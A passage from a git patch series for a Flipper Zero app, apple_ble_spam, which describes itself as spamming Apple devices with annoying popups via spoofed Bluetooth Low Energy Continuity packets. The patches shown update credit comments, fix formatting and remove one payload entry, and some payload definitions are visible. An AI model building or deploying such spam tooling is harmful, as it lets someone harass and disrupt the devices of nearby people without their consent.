From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 02:19:29 +0200 Subject: [PATCH 08/10] Update credits --nobuild --- applications/external/apple_ble_spam/apple_ble_spam.c | 4 +++- applications/external/apple_ble_spam/application.fam | 2 +- .../external/apple_ble_spam/lib/continuity/continuity.c | 4 +++- .../external/apple_ble_spam/lib/continuity/continuity.h | 4 +++- 4 files changed, 10 insertions(+), 4 deletions(-) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index 73c80a247..cfdb5fe95 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -15,9 +15,11 @@ typedef struct { } Payload; // Hacked together by @Willy-JL +// Custom adv logic by @Willy-JL and @xMasterX +// Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A // Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ -// Custom adv logic and Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ +// Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ static Payload payloads[] = { #if false diff --git a/applications/external/apple_ble_spam/application.fam b/applications/external/apple_ble_spam/application.fam index a76a181ee..55cd762fe 100644 --- a/applications/external/apple_ble_spam/application.fam +++ b/applications/external/apple_ble_spam/application.fam @@ -13,7 +13,7 @@ App( name="continuity", ), ], - fap_author="@Willy-JL & @techryptic", + fap_author="@Willy-JL", # Plus research from @ECTO-1A @xMasterX and @techryptic fap_version="1.0", fap_description="Spam Apple devices with annoying popups and notifications via BLE packets", ) 
diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.c b/applications/external/apple_ble_spam/lib/continuity/continuity.c index 99513f379..852fa8ccc 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.c +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.c @@ -2,9 +2,11 @@ #include // Hacked together by @Willy-JL +// Custom adv logic by @Willy-JL and @xMasterX +// Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A // Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ -// Custom adv logic and Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ +// Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ static const char* continuity_type_names[ContinuityTypeCount] = { [ContinuityTypeAirDrop] = "AirDrop", diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.h b/applications/external/apple_ble_spam/lib/continuity/continuity.h index e1789f16f..98c3df67d 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.h +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.h @@ -4,9 +4,11 @@ #include // Hacked together by @Willy-JL +// Custom adv logic by @Willy-JL and @xMasterX +// Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A // Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ -// Custom adv logic and Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ +// Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ typedef enum { ContinuityTypeAirDrop = 0x05, From 7e9f0657a4468ccd0bba52d6d5c1d6d0f427fb38 Mon Sep 17 00:00:00 2001 
From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 02:33:14 +0200 Subject: [PATCH 09/10] ./fBt FoRmAt FoRmAt_pY --nobuild --- applications/external/apple_ble_spam/application.fam | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/applications/external/apple_ble_spam/application.fam b/applications/external/apple_ble_spam/application.fam index 55cd762fe..985c03fd1 100644 --- a/applications/external/apple_ble_spam/application.fam +++ b/applications/external/apple_ble_spam/application.fam @@ -13,7 +13,7 @@ App( name="continuity", ), ], - fap_author="@Willy-JL", # Plus research from @ECTO-1A @xMasterX and @techryptic + fap_author="@Willy-JL", # Plus research from @ECTO-1A @xMasterX and @techryptic fap_version="1.0", fap_description="Spam Apple devices with annoying popups and notifications via BLE packets", ) From bf55e9b5a9c4676cc5b9a772c8090eb4a39be54f Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 02:53:15 +0200 Subject: [PATCH 10/10] Random mac breaks "dismiss active actions" so poof --nobuild --- applications/external/apple_ble_spam/apple_ble_spam.c | 8 -------- 1 file changed, 8 deletions(-) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index cfdb5fe95..5609cd696 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -64,14 +64,6 @@ static Payload payloads[] = { .type = ContinuityTypeNearbyAction, .data = {.nearby_action = {.flags = 0xC0, .type = 0x00}}, }}, - {.title = "Dismiss Active Actions", - .text = "Close current Nearby Actions", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0x00, .type = 0x00}}, - }}, {.title = "AppleTV AutoFill", .text = "Banner, unlocked, long range", .random = false,